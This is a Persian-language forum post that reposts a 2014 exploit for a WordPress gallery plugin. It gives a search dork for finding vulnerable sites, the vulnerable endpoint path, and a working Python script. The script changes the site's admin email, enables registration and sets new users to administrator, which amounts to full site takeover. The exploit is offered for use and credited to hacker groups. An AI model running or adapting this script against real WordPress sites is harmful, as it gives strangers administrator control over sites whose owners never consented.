SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulner

بستن
X
بستن
 
  • صفحه از 1
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید
قبلی template بعدی
  • #1

    Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulner

    Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability

    کد:
    #Exploit Title : Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability
#Author : Hannaichi [@dntkun]
#Date : February 5th, 2014
#Type : php, html, htm, asp, etc.
#Category : Web Applications
#Vulnerability : Unauthenticated Configuration Access
#Tested On : Windows 7 32-bit | Google Chrome
 
#Dork : inurl:/wp-content/plugins/premium_gallery_manager/ | USE YOUR BRAIN =))
 
#Exploit : http://victim/[PATH]/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php
 
#POC :
Save File As Python (.py) =
import httplib, urllib
 
#target site
site = "victim" #<--- no http:// or https://
#path to ajax.php
url = "/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php"
 
def ChangeOption(site, url, option_name, option_value):
    params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
    conn = httplib.HTTPConnection(site)
    conn.request("POST", url, params, headers)
    response = conn.getresponse()
    print response.status, response.reason
    data = response.read()
    print data
    conn.close()
       
ChangeOption(site, url, "admin_email", "[email protected]")
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "administrator")
print "Now register a new user, they are an administrator by default!"
 
 
#Place It Broo No Lazy For This :D !!
 
--------------------------------------------------------------------------------------------------------------------
 
Thanks to: #AnonSec Hackers - Borneo Security - Bekantan Crew - Indonesian Hacker - Muslim Hacker - You :*
 
    [align=center]IRH WebScanner Tools V.1
    |90%//////////////////////////////////////////|

    [/align]
    برچسب ها: هیچ یک
قبلی template بعدی
صبر کنید ..
X